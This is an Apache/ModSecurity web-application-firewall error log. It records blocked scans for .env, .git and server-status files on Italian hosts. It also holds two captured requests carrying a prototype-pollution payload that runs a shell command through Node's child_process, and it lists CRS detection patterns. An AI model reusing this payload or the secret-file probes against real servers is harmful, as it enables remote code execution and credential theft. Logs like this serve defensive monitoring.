[Wed Jan 07 21:12:59.915444 2026] [:error] [pid 1248394] [client 52.28.0.251:50134] [client 52.28.0.251] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV6-SyKP3LfiSmVjqw0tlwAAAAU"]
[Thu Jan 08 06:29:12.422152 2026] [:error] [pid 1270039] [client 13.203.200.220:37290] [client 13.203.200.220] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV9AqJccQYhM1DUhi_W53wAAAAQ"]
[Thu Jan 08 06:29:12.422757 2026] [:error] [pid 1270039] [client 13.203.200.220:37290] [client 13.203.200.220] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV9AqJccQYhM1DUhi_W53wAAAAQ"]
[Thu Jan 08 06:29:12.423750 2026] [:error] [pid 1270039] [client 13.203.200.220:37290] [client 13.203.200.220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV9AqJccQYhM1DUhi_W53wAAAAQ"]
[Thu Jan 08 06:29:12.423910 2026] [:error] [pid 1270039] [client 13.203.200.220:37290] [client 13.203.200.220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV9AqJccQYhM1DUhi_W53wAAAAQ"]
[Thu Jan 08 06:41:37.305556 2026] [:error] [pid 1270039] [client 13.203.200.220:38010] [client 13.203.200.220] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV9DkZccQYhM1DUhi_W54gAAAAQ"]
[Thu Jan 08 06:41:37.306028 2026] [:error] [pid 1270039] [client 13.203.200.220:38010] [client 13.203.200.220] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV9DkZccQYhM1DUhi_W54gAAAAQ"]
[Thu Jan 08 06:41:37.306955 2026] [:error] [pid 1270039] [client 13.203.200.220:38010] [client 13.203.200.220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV9DkZccQYhM1DUhi_W54gAAAAQ"]
[Thu Jan 08 06:41:37.307167 2026] [:error] [pid 1270039] [client 13.203.200.220:38010] [client 13.203.200.220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV9DkZccQYhM1DUhi_W54gAAAAQ"]
[Thu Jan 08 17:19:28.031354 2026] [:error] [pid 1270039] [client 2.57.122.173:49526] [client 2.57.122.173] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aV_ZEJccQYhM1DUhi_W6JgAAAAQ"]
[Thu Jan 08 17:19:28.031633 2026] [:error] [pid 1270039] [client 2.57.122.173:49526] [client 2.57.122.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aV_ZEJccQYhM1DUhi_W6JgAAAAQ"]
[Thu Jan 08 17:19:28.031793 2026] [:error] [pid 1270039] [client 2.57.122.173:49526] [client 2.57.122.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aV_ZEJccQYhM1DUhi_W6JgAAAAQ"]
[Thu Jan 08 21:11:11.355942 2026] [authz_core:error] [pid 1270037] [client 206.81.24.74:55762] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Jan 08 21:11:14.354176 2026] [:error] [pid 1270043] [client 206.81.24.74:55802] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWAPYgvEr1EpOYnVfM6rgwAAAAc"]
[Thu Jan 08 21:11:14.354408 2026] [:error] [pid 1270043] [client 206.81.24.74:55802] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWAPYgvEr1EpOYnVfM6rgwAAAAc"]
[Thu Jan 08 21:11:14.354588 2026] [:error] [pid 1270043] [client 206.81.24.74:55802] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWAPYgvEr1EpOYnVfM6rgwAAAAc"]
[Thu Jan 08 21:11:22.729598 2026] [authz_core:error] [pid 1270042] [client 165.227.84.14:50424] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Jan 08 21:11:25.734097 2026] [:error] [pid 1270043] [client 165.227.84.14:50462] [client 165.227.84.14] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWAPbQvEr1EpOYnVfM6rhQAAAAc"]
[Thu Jan 08 21:11:25.734315 2026] [:error] [pid 1270043] [client 165.227.84.14:50462] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWAPbQvEr1EpOYnVfM6rhQAAAAc"]
[Thu Jan 08 21:11:25.734484 2026] [:error] [pid 1270043] [client 165.227.84.14:50462] [client 165.227.84.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWAPbQvEr1EpOYnVfM6rhQAAAAc"]
[Fri Jan 09 03:40:42.529527 2026] [:error] [pid 1290987] [client 185.177.72.70:3454] [client 185.177.72.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWBqqpa6YpMWICkHe7jFzAAAAAI"]
[Fri Jan 09 03:40:42.529777 2026] [:error] [pid 1290987] [client 185.177.72.70:3454] [client 185.177.72.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWBqqpa6YpMWICkHe7jFzAAAAAI"]
[Fri Jan 09 03:40:42.529937 2026] [:error] [pid 1290987] [client 185.177.72.70:3454] [client 185.177.72.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWBqqpa6YpMWICkHe7jFzAAAAAI"]
[Fri Jan 09 03:40:44.678668 2026] [:error] [pid 1291018] [client 185.177.72.70:3462] [client 185.177.72.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWBqrPa-381C0T8V_x3ZsAAAAAU"]
[Fri Jan 09 03:40:44.678812 2026] [:error] [pid 1291018] [client 185.177.72.70:3462] [client 185.177.72.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWBqrPa-381C0T8V_x3ZsAAAAAU"]
[Fri Jan 09 03:40:44.679023 2026] [:error] [pid 1291018] [client 185.177.72.70:3462] [client 185.177.72.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWBqrPa-381C0T8V_x3ZsAAAAAU"]
[Fri Jan 09 03:40:44.679181 2026] [:error] [pid 1291018] [client 185.177.72.70:3462] [client 185.177.72.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWBqrPa-381C0T8V_x3ZsAAAAAU"]
[Fri Jan 09 03:40:46.773001 2026] [:error] [pid 1290986] [client 185.177.72.70:3468] [client 185.177.72.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWBqrnvPx48oXeBpWHApfQAAAAE"]
[Fri Jan 09 03:40:46.773157 2026] [:error] [pid 1290986] [client 185.177.72.70:3468] [client 185.177.72.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWBqrnvPx48oXeBpWHApfQAAAAE"]
[Fri Jan 09 03:40:46.773371 2026] [:error] [pid 1290986] [client 185.177.72.70:3468] [client 185.177.72.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWBqrnvPx48oXeBpWHApfQAAAAE"]
[Fri Jan 09 03:40:46.773524 2026] [:error] [pid 1290986] [client 185.177.72.70:3468] [client 185.177.72.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWBqrnvPx48oXeBpWHApfQAAAAE"]
[Fri Jan 09 03:41:19.753934 2026] [:error] [pid 1290987] [client 185.177.72.70:16098] [client 185.177.72.70] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWBqz5a6YpMWICkHe7jFzgAAAAI"]
[Fri Jan 09 03:41:19.754157 2026] [:error] [pid 1290987] [client 185.177.72.70:16098] [client 185.177.72.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWBqz5a6YpMWICkHe7jFzgAAAAI"]
[Fri Jan 09 03:41:19.754312 2026] [:error] [pid 1290987] [client 185.177.72.70:16098] [client 185.177.72.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWBqz5a6YpMWICkHe7jFzgAAAAI"]
[Fri Jan 09 03:41:21.925683 2026] [:error] [pid 1291018] [client 185.177.72.70:16106] [client 185.177.72.70] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitignore"] [unique_id "aWBq0fa-381C0T8V_x3ZsgAAAAU"]
[Fri Jan 09 03:41:21.925898 2026] [:error] [pid 1291018] [client 185.177.72.70:16106] [client 185.177.72.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitignore"] [unique_id "aWBq0fa-381C0T8V_x3ZsgAAAAU"]
[Fri Jan 09 03:41:21.926047 2026] [:error] [pid 1291018] [client 185.177.72.70:16106] [client 185.177.72.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitignore"] [unique_id "aWBq0fa-381C0T8V_x3ZsgAAAAU"]
